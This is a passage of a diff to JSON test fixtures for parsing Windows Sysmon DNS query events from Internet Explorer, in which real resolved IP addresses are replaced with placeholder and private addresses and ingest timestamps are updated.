t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19494,11 +19232,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -19506,7 +19244,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -19514,7 +19252,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -19522,7 +19260,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -19530,21 +19268,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -19560,22 +19298,22 @@ "ocsp.comodoca4.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742567800Z", + "ingested": "2021-12-09T13:50:23.457629100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", 
"provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", @@ -19643,52 +19381,52 @@ "type": "CNAME" }, { - "data": "52.4.111.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.205.68.184", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.0.28.154", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.225.82.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.213.13.245", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.171.66", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.207.199.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.72.57.144", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
@@ -19705,21 +19443,14 @@ "sync.crwdcntrl.net" ], "ip": [ - "52.4.111.14", - "52.205.68.184", - "52.0.28.154", - "34.225.82.232", - "18.213.13.245", - "52.22.171.66", - "52.207.199.229", - "52.72.57.144", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742576200Z", + "ingested": "2021-12-09T13:50:23.457635200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 
(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", 
@@ -19791,11 +19522,11 @@
 "type": "CNAME"
 },
 {
- "data": "159.127.42.114",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -19803,7 +19534,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -19811,17 +19542,17 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "159.127.42.114",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30"
+ "192.168.92.30"
 ]
 },
 "network": {
@@ -19839,18 +19570,18 @@ "match.sync.ad.cpe.dotomi.com" ], "ip": [ - "159.127.42.114", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742584600Z", + "ingested": "2021-12-09T13:50:23.457640800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:159.127.42.114;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sync.ad.cpe.dotomi.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cpe.us.dotomi.weighted.com.akadns.net;type: 5 cpe.us.iad.dotomi.weighted.com.akadns.net;type: 5 iad04-convex.dotomi.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:10.067Z", 
@@ -19925,12 +19656,12 @@
 "type": "CNAME"
 },
 {
- "data": "204.154.111.122",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "204.154.111.122"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -19947,13 +19678,13 @@ "tps10230.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742593Z", + "ingested": "2021-12-09T13:50:23.457646800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066534000Z'/\u003e\u003cEventRecordID\u003e209\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.627\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10230.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20028,12 +19759,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -20050,13 +19781,13 @@ "tps10221.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742601600Z", + "ingested": "2021-12-09T13:50:23.457652700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:11.066558700Z'/\u003e\u003cEventRecordID\u003e210\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:10.650\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps10221.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:11.066Z", @@ -20120,11 +19851,11 @@ "type": "CNAME" }, { - "data": "31.13.71.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -20132,7 +19863,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -20140,7 +19871,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -20148,7 +19879,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -20156,21 +19887,21 @@
 "type": "AAAA"
 },
 {
- "data": "192.12.94.30",
+ "data": "192.168.94.30",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "31.13.71.36",
- "192.5.6.30",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30",
- "192.12.94.30"
+ "192.168.94.30"
 ]
 },
 "network": {
@@ -20186,22 +19917,22 @@ "www.facebook.com" ], "ip": [ - "31.13.71.36", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742610200Z", + "ingested": "2021-12-09T13:50:23.457658600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 